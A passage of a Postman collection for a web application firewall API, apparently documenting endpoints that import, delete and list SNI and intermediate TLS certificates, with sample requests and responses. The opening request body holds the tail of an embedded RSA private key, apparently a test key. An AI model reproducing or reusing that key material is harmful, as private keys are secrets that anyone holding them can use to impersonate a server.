siIzf/nFIW2pM3qJ57cXBBk766mvttvvglqSBpOcnob6epDn5URrgPO\\nM3DPmBFP0J7E90EtFi+jO8uxhofn9dM0YPUtkZ8CgYEAtq+hzPzCHCdDOVfS9TUY\\nWNyQlDFhBXpDPmuQV/cNgg1rmrTybR9t8qLIEZM5UhWfzCMbYoG335tarZpXnj1q\\nVJjbFdHkpTeu8JSs4JoTLW8c44WVkJT/d+gg7dUVrVT2EJ47v+MGvbaGXpYmbdWs\\nsVIYfXlvLXZ6z4esAMe34ikCgYEAkbp9uZ/+TY1t5LfGxlHEHFtOJF7iT1w10se9\\nnwJmvzvHIV/z5abncms355+IhIikh6ro7ikyz8EilHMPlBxJiqQBYnIXJzDHHLpA\\njSAFEXXBA2kHyQ9A4UaL41MkU58mPwMOFZ7vALJyqshNLGscWc6chhClgDzOBe0t\\nEmIlJ78CgYA8lK0H/7oMJe/zdmIKvfFy6aIjqeZCjzxoS8F5uLozfwR3C5R5rdJa\\n5Jsl7wLTY6nit/maGz5nJlw7HMZBQRV22+6cZowbd3vZS4GyF1QAgNet1YOjaKDG\\nbUmOHqSxt7LndI75ut5x75CEaKo6+AvGw7ogEK9sQlfBTmm5u6I6Bw\\u003d\\u003d\\n-----END RSA PRIVATE KEY-----\",\r\n\t\"certificate\": \"-----BEGIN CERTIFICATE-----\\nMIIETDCCAzSgAwIBAgIQaV1xzti5TqyoqF1V4GBh/TANBgkqhkiG9w0BAQsFADBe\\nMQswCQYDVQQGEwJDTjEOMAwGA1UEChMFTXlTU0wxKzApBgNVBAsTIk15U1NMIFRl\\nc3QgUlNBIC0gRm9yIHRlc3QgdXNlIG9ubHkxEjAQBgNVBAMTCU15U1NMLmNvbTAe\\nFw0yMDAxMDYxMDA4MzlaFw0yMTAxMDUxMDA4MzlaMGcxCzAJBgNVBAYTAkNOMRAw\\nDgYDVQQIEwdCZWlqaW5nMRAwDgYDVQQHEwdCZWlqaW5nMQswCQYDVQQKEwJGVDEM\\nMAoGA1UECxMDREVWMRkwFwYDVQQDExB0ZXN0Lnp3c2hhbmcuY29tMIIBIjANBgkq\\nhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAsRnaVTnPUuIAimUt9f8fPn3j1p62nVEl\\naXuI0y0SW3tPn0EQjmiHYETd0nmVSpIGRNJ34ov6e2adFO1qzvF71HAX7utIkVjz\\nvkSboa+DLVc/FOktFxa/q5AQxjU4Tv6EGIPmsRhZpKa/3VjMAtdxDA6RIHOn/E3F\\n4AJB55mUeNu5sHMJ5ekLJTQE/ms7yzbJOwE+tUVI2pRsky9claaidwo3Vt1vl3Ve\\nWqWpb592iDAi5QyCq7BzPRpsfQlu72k9ITmBwh3TmJmwtWRJf5EVWuFPY+KQmblq\\nWzMD32ODGkD0HO2Qq/PvN8MQ7u7UZNZEuILLd9AZBTar7V+Dg9ezBwIDAQABo4H8\\nMIH5MA4GA1UdDwEB/wQEAwIFoDAdBgNVHSUEFjAUBggrBgEFBQcDAQYIKwYBBQUH\\nAwIwHwYDVR0jBBgwFoAUKIEmBdE0Gj/Bcw+7k88VHD8Dv38wYwYIKwYBBQUHAQEE\\nVzBVMCEGCCsGAQUFBzABhhVodHRwOi8vb2NzcC5teXNzbC5jb20wMAYIKwYBBQUH\\nMAKGJGh0dHA6Ly9jYS5teXNzbC5jb20vbXlzc2x0ZXN0cnNhLmNydDBCBgNVHREE\\nOzA5ghBob21lLnp3c2hhbmcuY29tghMgb2ZmaWNlLnp3c2hhbmcuY29tghB0ZXN0\\nLnp3c2hhbmcuY29tMA0GCSqGSIb3DQEBCwUAA4IBAQBb9jqtvwmvsqOGD0RG5Lkw\\n5Wg6eNwCNqm1PmzQNDvv8F+5dI0D0Y5bOOGyf1hnBfLr9WhorGq5fvobeIltQcA5\\n0tTsPiGXq9/umYJ7npcY+rjw6KBnE3n11hV0eYBDAEbIJAauZ27kF3148x3v32TS\\nkmkcjP/+6/KpELorljAJkVrFfcgrKbgjQdhnXWTRnnDUztr1rhhc5h1/9Yjn/q3C\\nOa3ClG100VNF78ipEVRFv9kObd1XVsc37KBhiZrXx5VWCxSlReFiqNLo9fUD4usB\\nqrsYZXZOTqw6kLRMb+zJZ3Uffkceot995naP+cHP0UC4kOFoNybfbD5s3jxeCsTo\\n-----END CERTIFICATE-----\",\r\n\t\"action\": \"import\"\r\n}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/snicertificate","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","snicertificate"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The application ID, it can be obtained from List Applications API."}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 07:38:42 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"47"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"c661781a-869b-11e9-b96f-a7a1d2c8a45d"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"avnwRFQ7oAMFRXQ="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cf62001-a754a59a5f3e6a7b759b695c;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n\t\"detail\": \"successfully\"\n}"},{"id":"f5958a6e-4ace-4276-9ea2-ab40b8971b80","name":"Delete Successfully","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":"{\r\n\t\"action\": \"delete\",\r\n\t\"id\": 1\r\n}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/snicertificate","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","snicertificate"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The application ID, it can be obtained from List Applications API."}]}},"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\"\n}"}],"_postman_id":"4fb7ee2b-df43-4330-b746-b5b638e08008"},{"name":"Get SNI Certificate Detail","id":"4a50b7c0-f9bb-4f27-a294-d0938450bccd","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"url":"https://api.tim.waasonline.com/v1/application/:ep_id/snicertdetail?id={{id}}","description":"<p>Get the detail information of SNI certificate.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","snicertdetail"],"host":["api","tim","waasonline","com"],"query":[{"description":{"content":"<p>The ID of the SNI certificate</p>\n","type":"text/plain"},"key":"id","value":"{{id}}"}],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"be481c22-2e76-48e9-9b20-aa67f8456a22","name":"Success","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/snicertdetail?id={{id}}","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","snicertdetail"],"query":[{"key":"id","value":"{{id}}"}],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 08:15:27 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"296"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"e92e0f63-86a0-11e9-934e-4145cc4e25d4"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"avtI8EX5IAMFqlg="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cf6289f-89f6a2e4ec4ac48237acbe68;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\",\n    \"result\": {\n        \"extension\": [\n            {\n                \"Critical\": \"Yes\",\n                \"Content\": \"Digital Signature, Key Encipherment\",\n                \"Name\": \"keyUsage\"\n            },\n            {\n                \"Critical\": \"No\",\n                \"Content\": \"TLS Web Server Authentication, TLS Web Client Authentication\",\n                \"Name\": \"extendedKeyUsage\"\n            },\n            {\n                \"Critical\": \"No\",\n                \"Content\": \"keyid:28:81:26:05:D1:34:1A:3F:C1:73:0F:BB:93:CF:15:1C:3F:03:BF:7F\\n\",\n                \"Name\": \"authorityKeyIdentifier\"\n            },\n            {\n                \"Critical\": \"No\",\n                \"Content\": \"OCSP - URI:http://ocsp.myssl.com\\nCA Issuers - URI:http://ca.myssl.com/myssltestrsa.crt\\n\",\n                \"Name\": \"authorityInfoAccess\"\n            },\n            {\n                \"Critical\": \"No\",\n                \"Content\": \"DNS:home.mytest.com, DNS: office.mytest.com, DNS:test.mytest.com\",\n                \"Name\": \"subjectAltName\"\n            }\n        ],\n        \"subject\": \"C=CN, ST=Beijing, L=Beijing, O=FT, OU=DEV, CN=test.mytest.com\",\n        \"valid_to\": \"2021-01-05 10:08:39 UTC\",\n        \"valid_from\": \"2020-01-06 10:08:39 UTC\",\n        \"serial_number\": \"69:5d:71:ce:d8:b9:4e:ac:a8:a8:5d:55:e0:60:61:fd\",\n        \"version\": 3,\n        \"issuer\": \"C=CN, O=MySSL, OU=MySSL Test RSA - For test use only, CN=MySSL.com\"\n    }\n}"},{"id":"ec8a2389-1e32-446a-9587-7ae8f3b0d58f","name":"Fail","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/snicertdetail?id={{id}}","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","snicertdetail"],"query":[{"key":"id","value":"{{id}}"}],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The application ID, it can be obtained from List Applications API."}]}},"status":"Unauthorized","code":401,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 08:15:57 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"34"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"faedfa15-86a0-11e9-9e5c-4b813cea4e85"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amzn-ErrorType","value":"UnauthorizedException"},{"key":"x-amz-apigw-id","value":"avtNmHoloAMFqMw="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"Request unauthorized\"\n}"}],"_postman_id":"4a50b7c0-f9bb-4f27-a294-d0938450bccd"},{"name":"Get Intermediate Certificate","id":"9035dd11-4002-4bdc-a635-90c17b3bee67","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"url":"https://api.tim.waasonline.com/v1/application/:ep_id/intercertificate?size={{size}}&cursor={{cursor}}&forward={{forward}}","description":"<p>Get the configuration of intermediate certificates.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","intercertificate"],"host":["api","tim","waasonline","com"],"query":[{"description":{"content":"<p>Page size</p>\n","type":"text/plain"},"key":"size","value":"{{size}}"},{"description":{"content":"<p>To list the items of the first page, leave the cursor value empty.</p>\n<p>To go forward to next page, get the value of the \"next_cursor\" parameter in the result of the current page, then paste it here as the cursor value.</p>\n<p>To go to the previous page, get the \"prev_cursor\" value, then paste it here as the cursor value.</p>\n","type":"text/plain"},"key":"cursor","value":"{{cursor}}"},{"description":{"content":"<p>True: the next page;</p>\n<p>False: the previous page.</p>\n","type":"text/plain"},"key":"forward","value":"{{forward}}"}],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"44921f15-5a21-4197-907f-d79cb66111f4","name":"Fail","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/intercertificate?size={{size}}&cursor={{cursor}}&forward={{forward}}","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","intercertificate"],"query":[{"key":"size","value":"{{size}}"},{"key":"cursor","value":"{{cursor}}"},{"key":"forward","value":"{{forward}}"}],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"Unauthorized","code":401,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 08:15:57 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"34"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"faedfa15-86a0-11e9-9e5c-4b813cea4e85"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amzn-ErrorType","value":"UnauthorizedException"},{"key":"x-amz-apigw-id","value":"avtNmHoloAMFqMw="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"Request unauthorized\"\n}"},{"id":"fa9b0839-cc37-473e-adfa-e8a6a4eb5883","name":"Success","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/intercertificate?size={{size}}&cursor={{cursor}}&forward={{forward}}","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","intercertificate"],"query":[{"key":"size","value":"{{size}}"},{"key":"cursor","value":"{{cursor}}"},{"key":"forward","value":"{{forward}}"}],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 08:15:27 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"296"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"e92e0f63-86a0-11e9-934e-4145cc4e25d4"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"avtI8EX5IAMFqlg="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cf6289f-89f6a2e4ec4ac48237acbe68;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n\t\"detail\": \"successfully\",\n\t\"total\": 2,\n\t\"prev_cursor\": \"eyJwb2xpY3lfbmFtZV9pZCI6IHsiUyI6ICI4NTk0NTgxODExX3pzaGFuZ19mb3J0aXdlYl9jbG91ZF90ZXN0X2NvbV8xIn0sICJlcF9pZCI6IHsiUyI6ICI4NTk0NTgxODExIn0sICJpZCI6IHsiTiI6ICIxIn19\",\n\t\"next_cursor\": \"\",\n\t\"hits\": [\n\t\t{\n\t\t\t\"id\": 1,\n\t\t\t\"issued_to\": \"MySSL.com\",\n\t\t\t\"issued_by\": \"MySSL.com\",\n\t\t\t\"expired\": \"2027-11-16 05:35:35 UTC\"\n\t\t},\n\t\t{\n\t\t\t\"id\": 2,\n\t\t\t\"issued_to\": \"MySSL.com\",\n\t\t\t\"issued_by\": \"MySSL.com\",\n\t\t\t\"expired\": \"2027-11-16 05:35:35 UTC\"\n\t\t}\n\t]\n}"}],"_postman_id":"9035dd11-4002-4bdc-a635-90c17b3bee67"},{"name":"Update Intermediate Certificate","id":"14a907d3-d406-48bd-bb86-65de70ee6a62","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":"{\r\n\t\"certificate\": \"-----BEGIN CERTIFICATE-----\\nMIIDuzCCAqOgAwIBAgIQSEIWDPfWTDKZcWNyL2O+fjANBgkqhkiG9w0BAQsFADBf\\nMQswCQYDVQQGEwJDTjEOMAwGA1UEChMFTXlTU0wxLDAqBgNVBAsTI015U1NMIFRl\\nc3QgUm9vdCAtIEZvciB0ZXN0IHVzZSBvbmx5MRIwEAYDVQQDEwlNeVNTTC5jb20w\\nHhcNMTcxMTE2MDUzNTM1WhcNMjcxMTE2MDUzNTM1WjBeMQswCQYDVQQGEwJDTjEO\\nMAwGA1UEChMFTXlTU0wxKzApBgNVBAsTIk15U1NMIFRlc3QgUlNBIC0gRm9yIHRl\\nc3QgdXNlIG9ubHkxEjAQBgNVBAMTCU15U1NMLmNvbTCCASIwDQYJKoZIhvcNAQEB\\nBQADggEPADCCAQoCggEBAMBOtZk0uzdG4dcIIdcAdSSYDbua0Bdd6N6s4hZaCOup\\nq7G7lwXkCyViTYAFa3wZ0BMQ4Bl9Q4j82R5IaoqG7WRIklwYnQh4gZ14uRde6Mr8\\nyzvPRbAXKVoVh4NPqpE6jWMTP38mh94bKc+ITAE5QBRhCTQ0ah2Hq846ZiDAj6sY\\nhMJuhUWegVGd0vh0rvtzvYNx7NGyxzoj6MxkDiYfFiuBhF2R9Tmq2UW9KCZkEBVL\\nQ/YKQuvZZKFqR7WUU8GpCwzUm1FZbKtaCyRRvzLa5otghU2teKS5SKVI+Tpxvasp\\nfu4eXBvveMgyWwDpKlzLCLgvoC9YNpbmdiVxNNkjwNsCAwEAAaN0MHIwDgYDVR0P\\nAQH/BAQDAgGGMA8GA1UdJQQIMAYGBFUdJQAwDwYDVR0TAQH/BAUwAwEB/zAfBgNV\\nHSMEGDAWgBSa8Z+5JRISiexzGLmXvMX4oAp+UzAdBgNVHQ4EFgQUKIEmBdE0Gj/B\\ncw+7k88VHD8Dv38wDQYJKoZIhvcNAQELBQADggEBAEl01ufit9rUeL5kZ31ox2vq\\n648azH/r/GR1S+mXci0Mg6RrDdLzUO7VSf0JULJf98oEPr9fpIZuRTyWcxiP4yh0\\nwVd35OIQBTToLrMOWYWuApU4/YLKvg4A86h577kuYeSsWyf5kk0ngXsL1AFMqjOk\\nTc7p8PuW68S5/88Pe+Bq3sAaG3U5rousiTIpoN/osq+GyXisgv5jd2M4YBtl/NlD\\nppZs5LAOjct+Aaofhc5rNysonKjkd44K2cgBkbpOMj0dbVNKyL2/2I0zyY1FU2Mk\\nURUHyMW5Qd5Q9g6Y4sDOIm6It9TF7EjpwMs42R30agcRYzuUsN72ZFBYFJwnBX8\\u003d\\n-----END CERTIFICATE-----\",\r\n\t\"action\": \"import\"\r\n}"},"url":"https://api.tim.waasonline.com/v1/application/:ep_id/intercertificate","description":"<p>Modify the configuration of intermediate certificates.</p>\n<p>A body including all parameters and values in the request that conforms to the following JSON schema:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"type\": \"object\",\n    \"properties\": {\n        \"action\": {\n            \"description\": \"The type of the update operation.\",\n            \"type\": \"string\",\n            \"enum\": [\"import\", \"delete\"]\n        },\n        \"certificate\": {\n            \"description\": \"The intermediate certificate to be imported, required on action 'import'.\",\n            \"type\": \"string\"\n        },\n        \"id\": {\n            \"description\": \"The certificate id to be deleted, required on action 'delete'.\",\n            \"type\": \"integer\"\n        }\n    }\n}\n</code></pre>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","intercertificate"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"c974280c-5908-4079-8365-453f49f572ec","name":"Import Successfully","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"body":{"mode":"raw","raw":"{\r\n\t\"certificate\": \"-----BEGIN CERTIFICATE-----\\nMIIDuzCCAqOgAwIBAgIQSEIWDPfWTDKZcWNyL2O+fjANBgkqhkiG9w0BAQsFADBf\\nMQswCQYDVQQGEwJDTjEOMAwGA1UEChMFTXlTU0wxLDAqBgNVBAsTI015U1NMIFRl\\nc3QgUm9vdCAtIEZvciB0ZXN0IHVzZSBvbmx5MRIwEAYDVQQDEwlNeVNTTC5jb20w\\nHhcNMTcxMTE2MDUzNTM1WhcNMjcxMTE2MDUzNTM1WjBeMQswCQYDVQQGEwJDTjEO\\nMAwGA1UEChMFTXlTU0wxKzApBgNVBAsTIk15U1NMIFRlc3QgUlNBIC0gRm9yIHRl\\nc3QgdXNlIG9ubHkxEjAQBgNVBAMTCU15U1NMLmNvbTCCASIwDQYJKoZIhvcNAQEB\\nBQADggEPADCCAQoCggEBAMBOtZk0uzdG4dcIIdcAdSSYDbua0Bdd6N6s4hZaCOup\\nq7G7lwXkCyViTYAFa3wZ0BMQ4Bl9Q4j82R5IaoqG7WRIklwYnQh4gZ14uRde6Mr8\\nyzvPRbAXKVoVh4NPqpE6jWMTP38mh94bKc+ITAE5QBRhCTQ0ah2Hq846ZiDAj6sY\\nhMJuhUWegVGd0vh0rvtzvYNx7NGyxzoj6MxkDiYfFiuBhF2R9Tmq2UW9KCZkEBVL\\nQ/YKQuvZZKFqR7WUU8GpCwzUm1FZbKtaCyRRvzLa5otghU2teKS5SKVI+Tpxvasp\\nfu4eXBvveMgyWwDpKlzLCLgvoC9YNpbmdiVxNNkjwNsCAwEAAaN0MHIwDgYDVR0P\\nAQH/BAQDAgGGMA8GA1UdJQQIMAYGBFUdJQAwDwYDVR0TAQH/BAUwAwEB/zAfBgNV\\nHSMEGDAWgBSa8Z+5JRISiexzGLmXvMX4oAp+UzAdBgNVHQ4EFgQUKIEmBdE0Gj/B\\ncw+7k88VHD8Dv38wDQYJKoZIhvcNAQELBQADggEBAEl01ufit9rUeL5kZ31ox2vq\\n648azH/r/GR1S+mXci0Mg6RrDdLzUO7VSf0JULJf98oEPr9fpIZuRTyWcxiP4yh0\\nwVd35OIQBTToLrMOWYWuApU4/YLKvg4A86h577kuYeSsWyf5kk0ngXsL1AFMqjOk\\nTc7p8PuW68S5/88Pe+Bq3sAaG3U5rousiTIpoN/osq+GyXisgv5jd2M4YBtl/NlD\\nppZs5LAOjct+Aaofhc5rNysonKjkd44K2cgBkbpOMj0dbVNKyL2/2I0zyY1FU2Mk\\nURUHyMW5Qd5Q9g6Y4sDOIm6It9TF7EjpwMs42R30agcRYzuUsN72ZFBYFJwnBX8\\u003d\\n-----END CERTIFICATE-----\",\r\n\t\"action\": \"import\"\r\n}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/intercertificate","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","intercertificate"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 07:38:42 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"47"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"c661781a-869b-11e9-b96f-a7a1d2c8a45d"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"avnwRFQ7oAMFRXQ="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cf62001-a754a59a5f3e6a7b759b695c;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n\t\"detail\": \"successfully\"\n}"},{"id":"e3006539-7ebb-42a4-9343-5925ae74de28","name":"Fail","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\r\n\t\"certificate\": \"-----BEGIN CERTIFICATE-----\\nMIIDuzCCAqOgAwIBAgIQSEIWDPfWTDKZcWNyL2O+fjANBgkqhkiG9w0BAQsFADBf\\nMQswCQYDVQQGEwJDTjEOMAwGA1UEChMFTXlTU0wxLDAqBgNVBAsTI015U1NMIFRl\\nc3QgUm9vdCAtIEZvciB0ZXN0IHVzZSBvbmx5MRIwEAYDVQQDEwlNeVNTTC5jb20w\\nHhcNMTcxMTE2MDUzNTM1WhcNMjcxMTE2MDUzNTM1WjBeMQswCQYDVQQGEwJDTjEO\\nMAwGA1UEChMFTXlTU0wxKzApBgNVBAsTIk15U1NMIFRlc3QgUlNBIC0gRm9yIHRl\\nc3QgdXNlIG9ubHkxEjAQBgNVBAMTCU15U1NMLmNvbTCCASIwDQYJKoZIhvcNAQEB\\nBQADggEPADCCAQoCggEBAMBOtZk0uzdG4dcIIdcAdSSYDbua0Bdd6N6s4hZaCOup\\nq7G7lwXkCyViTYAFa3wZ0BMQ4Bl9Q4j82R5IaoqG7WRIklwYnQh4gZ14uRde6Mr8\\nyzvPRbAXKVoVh4NPqpE6jWMTP38mh94bKc+ITAE5QBRhCTQ0ah2Hq846ZiDAj6sY\\nhMJuhUWegVGd0vh0rvtzvYNx7NGyxzoj6MxkDiYfFiuBhF2R9Tmq2UW9KCZkEBVL\\nQ/YKQuvZZKFqR7WUU8GpCwzUm1FZbKtaCyRRvzLa5otghU2teKS5SKVI+Tpxvasp\\nfu4eXBvveMgyWwDpKlzLCLgvoC9YNpbmdiVxNNkjwNsCAwEAAaN0MHIwDgYDVR0P\\nAQH/BAQDAgGGMA8GA1UdJQQIMAYGBFUdJQAwDwYDVR0TAQH/BAUwAwEB/zAfBgNV\\nHSMEGDAWgBSa8Z+5JRISiexzGLmXvMX4oAp+UzAdBgNVHQ4EFgQUKIEmBdE0Gj/B\\ncw+7k88VHD8Dv38wDQYJKoZIhvcNAQELBQADggEBAEl01ufit9rUeL5kZ31ox2vq\\n648azH/r/GR1S+mXci0Mg6RrDdLzUO7VSf0JULJf98oEPr9fpIZuRTyWcxiP4yh0\\nwVd35OIQBTToLrMOWYWuApU4/YLKvg4A86h577kuYeSsWyf5kk0ngXsL1AFMqjOk\\nTc7p8PuW68S5/88Pe+Bq3sAaG3U5rousiTIpoN/osq+GyXisgv5jd2M4YBtl/NlD\\nppZs5LAOjct+Aaofhc5rNysonKjkd44K2cgBkbpOMj0dbVNKyL2/2I0zyY1FU2Mk\\nURUHyMW5Qd5Q9g6Y4sDOIm6It9TF7EjpwMs42R30agcRYzuUsN72ZFBYFJwnBX8\\u003d\\n-----END CERTIFICATE-----\",\r\n\t\"action\": \"import\"\r\n}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/intercertificate","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","intercertificate"],"variable":[{"key":"ep_id","value":"{{ep_id}}"}]}},"status":"Unauthorized","code":401,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 07:39:26 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"34"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"e120b283-869b-11e9-848f-1d541ed7c3fd"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amzn-ErrorType","value":"UnauthorizedException"},{"key":"x-amz-apigw-id","value":"avn3SE3koAMF_hQ="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"Request unauthorized\"\n}"},{"id":"ff11cde2-4e1a-4cc1-a869-ad4ea929536c","name":"Delete Successfully","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":"{\r\n\t\"action\": \"import\",\r\n\t\"id\": 1\r\n}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/intercertificate","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","intercertificate"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The application ID, it can be obtained from List Applications API."}]}},"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\"\n}"}],"_postman_id":"14a907d3-d406-48bd-bb86-65de70ee6a62"},{"name":"Get Intermediate Certificate Detail","id":"8c59cbe9-9f72-47e0-a929-7cbe13bc12a4","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"url":"https://api.tim.waasonline.com/v1/application/:ep_id/intercertdetail?id={{id}}","description":"<p>Get the detail information of intermediate certificate.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","intercertdetail"],"host":["api","tim","waasonline","com"],"query":[{"description":{"content":"<p>The ID of the intermediate certificate</p>\n","type":"text/plain"},"key":"id","value":"{{id}}"}],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"6cfda533-8114-4883-8ecf-22473f243838","name":"Success","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Basic 